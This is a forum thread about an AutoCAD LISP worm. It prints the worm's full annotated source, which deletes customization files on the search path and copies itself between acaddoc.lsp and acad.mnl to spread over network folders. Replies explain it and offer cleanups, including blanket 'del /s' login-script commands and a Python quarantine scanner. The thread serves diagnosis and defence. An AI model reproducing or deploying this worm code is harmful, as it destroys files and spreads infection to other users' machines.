Debugging what this LISP Virus is doing

Published 2019-04-04 14:59

Question:

My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.

I'm an architect and not exactly sure what this is doing with the repetitive "find" and "deletes".

Questions

  1. What is this replacing the files with (currently searching for acadapq) ?
  2. Who writes a virus for AutoCAD?!?!

Has anyone seen this before? The CAD forums aren't very helpful.

; save the current CMDECHO setting and switch command echo off, so nothing
; done below shows on the command line; it is restored at the very end
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
; bb is this copy's "version" digit; it is compared below with a digit read
; from other copies of the file
(setq bb 2)
; dpath: the folder of the drawing being opened
(setq dpath (getvar "dwgprefix"))
; wpath: MENUNAME returns the customization file path without extension;
; dropping the last 4 characters ("acad") leaves the support folder that
; holds acad.mnl
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

; delete every acad.fas on the search path: FINDFILE returns the first
; match, so the loop repeats until nothing is found (n becomes 2).
; Note that if a delete fails (e.g. a read-only file) n stays 0 and the
; loop never exits.
(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

; same for lcm.fas
(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

; same for acad.lsp
(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

; propagation routine: copy the file named in woldacad, line by line,
; over the file named in wnewacad
(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

; read line 4 of the drawing folder's acaddoc.lsp and take character 4 as
; its version digit (ab); a copy newer than this one (ab > bb) sets lbz
(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

; same check on acad.mnl in the support folder (nb); an older copy
; (nb < bb) or a missing acad.mnl also sets lbz
(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
; if flagged, overwrite the support folder's acad.mnl with the drawing
; folder's acaddoc.lsp; acad.mnl is loaded together with the menu, so the
; infection survives across AutoCAD sessions
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
; (chr 67) .. (chr 70) are "C" "D" "E" "F". If the drawing is NOT on one
; of those local drives (i.e. it is on a network or removable drive), write
; acad.mnl's contents into acaddoc.lsp next to the drawing so the code
; travels with the project; on a local drive, delete that acaddoc.lsp
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
; the next line begins with ";" so it is a comment: nothing named
; "acadapq" is actually loaded by this sample
;load "acadapq")
; restore the saved CMDECHO setting
(setvar "cmdecho" wold_cmd)

Answer 1:

It is doing a support file path walk, delete and replace of the common AutoCAD customization files ("acad.fas", "acad.lsp", "acaddoc.lsp"). I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product, i.e. AutoCAD Mechanical or Architectural Desktop?

The looping is essentially "while I keep finding it on the support path, delete it".

So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).

The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. It turns it off while running (so you don't notice), then restores the original setting.

A polite virus :\

When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on its support path. Every time AutoCAD loads a new .dwg it executes the "acaddoc.lsp".



Answer 2:

Follow these steps to get rid of this worm:

  1. Manually copy the attached routine to your PC: acaddocfix_1.6.lsp
  2. Load the lisp file using the APPLOAD command
  3. The lisp file will run automatically and it will clean all the existences of the worm in your support folders.

There is another way: we can do it as a batch file, run whenever any user starts his/her PC, as I checked with IT before.

Auto run: Run an antivirus or a cleaner to get rid of "acaddoc.lsp" files. Normally the cleaner routine installs a simple routine in your acad20XXdoc.lsp file which automatically cleans those files, but I recommend cleaning all the viruses with an anti-virus first. You can also run the -acaddoc.bat DOS batch file to clean all your drives manually. Run this batch once and it will delete all acaddoc.lsp files on your system.

NOTE: If any of the infected files in your AutoCAD Support folders are READ-ONLY, the cleaner won't be able to clean those files!!

Kindly refer to http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/



Answer 3:

The wild thing is that the lisp file only gets created when the files are opened on the network; local copies don't seem to have this issue. Add del /s acaddoc.lsp and del /s acad.lsp to all users' login scripts and run this for a week or so, and it should get rid of all the acaddoc.lsp and acad.lsp files which the virus comes in... Make sure you do not actually use any of these files for your own purposes before running the delete command, though.
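The two answers above clean up by deleting every acaddoc.lsp / acad.lsp outright, with the caveats that a legitimate site file could be lost and that read-only copies defeat the cleaner. The following is an added example, written for this page and not part of the thread or of any cleaner mentioned in it, of a more careful sweep: it walks a tree for the file names the posted worm creates, deletes or overwrites, identifies infected text copies by identifiers taken from the posted source (wwriteapp, wold_cmd, woldacad, wnewacad), flags compiled .fas and unmatched files for a human to review, and renames confirmed matches to *.quarantined after clearing the read-only bit, rather than deleting blindly. The directory names, the sample file contents and the two-signature threshold are assumptions for the demo; Python is used so the same script runs on a workstation or a file server.

```python
"""Scan a tree for copies of the acaddoc.lsp worm and quarantine them.

Added example for this thread (not the thread's own cleaner). Assumptions:
the file names below are the ones the posted sample touches, the signature
strings are identifiers from that sample, and two or more hits count as an
infection (one could be coincidence).
"""
import os
import shutil
import stat
import tempfile
from pathlib import Path

# Files the posted worm deletes, reads or overwrites.
TARGET_NAMES = {"acaddoc.lsp", "acad.lsp", "acad.mnl", "acad.fas", "lcm.fas"}
# Identifiers lifted from the posted worm source (text files only;
# .fas files are compiled, so a string match cannot confirm them).
SIGNATURES = (b"wwriteapp", b"wold_cmd", b"woldacad", b"wnewacad")


def signature_hits(data: bytes) -> int:
    """Number of worm identifiers present in a file's bytes."""
    return sum(1 for s in SIGNATURES if s in data)


def is_read_only(path: Path) -> bool:
    """Owner write bit cleared: on Windows this mirrors the read-only attribute."""
    return not (path.stat().st_mode & stat.S_IWRITE)


def classify(path: Path) -> str:
    """'infected' when two or more identifiers match; otherwise 'suspect'
    (compiled .fas or a worm file name without a match), left for review."""
    if path.suffix.lower() == ".fas":
        return "suspect"
    return "infected" if signature_hits(path.read_bytes()) >= 2 else "suspect"


def quarantine(path: Path) -> Path:
    """Rename an infected file so AutoCAD no longer finds it, clearing
    read-only first (the thread notes read-only copies defeat the cleaner)."""
    if is_read_only(path):
        path.chmod(path.stat().st_mode | stat.S_IWRITE)
    target = path.with_name(path.name + ".quarantined")
    path.rename(target)
    return target


def scan_tree(root, act: bool = False) -> list:
    """Report every target-named file under root; with act=True, quarantine
    the confirmed ones. Each entry records path, status and read-only flag."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in TARGET_NAMES:
                continue
            p = Path(dirpath) / name
            entry = {"path": str(p), "status": classify(p),
                     "read_only": is_read_only(p)}
            if act and entry["status"] == "infected":
                entry["quarantined_as"] = str(quarantine(p))
            results.append(entry)
    return results


# Constructed samples: the first mimics the opening lines of the posted worm,
# the second is a harmless site acaddoc.lsp that must NOT be removed.
WORM_SAMPLE = b"""(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(defun wwriteapp () (princ))
(setq woldacad "a") (setq wnewacad "b")
"""
CLEAN_SAMPLE = b"""; site acaddoc.lsp: load our own plotting helper
(load "plot_helper")
"""


def run_demo() -> dict:
    """Build a throwaway tree (assumed layout: two job folders plus a support
    folder), scan it, quarantine, and return what happened."""
    base = Path(tempfile.mkdtemp(prefix="lspscan_"))
    try:
        (base / "job1").mkdir()
        (base / "job1" / "acaddoc.lsp").write_bytes(WORM_SAMPLE)
        (base / "job2").mkdir()
        (base / "job2" / "acaddoc.lsp").write_bytes(CLEAN_SAMPLE)
        (base / "support").mkdir()
        mnl = base / "support" / "acad.mnl"
        mnl.write_bytes(WORM_SAMPLE)
        mnl.chmod(stat.S_IREAD)  # simulate the read-only copy the thread warns about
        (base / "support" / "acad.fas").write_bytes(b"\xfa\x5e compiled")
        rel = lambda e: Path(e["path"]).relative_to(base).as_posix()
        before = {rel(e): (e["status"], e["read_only"]) for e in scan_tree(base)}
        acted = scan_tree(base, act=True)
        return {
            "before": before,
            "quarantined": sorted(Path(e["quarantined_as"]).name
                                  for e in acted if "quarantined_as" in e),
            "remaining": sorted(rel(e) for e in scan_tree(base)),
        }
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

Run it without `act=True` first and review the "suspect" entries by hand; only the confirmed copies are renamed, so a site's own acaddoc.lsp survives, and the .quarantined files can be inspected or deleted afterwards once the source of reinfection on the network share has been dealt with.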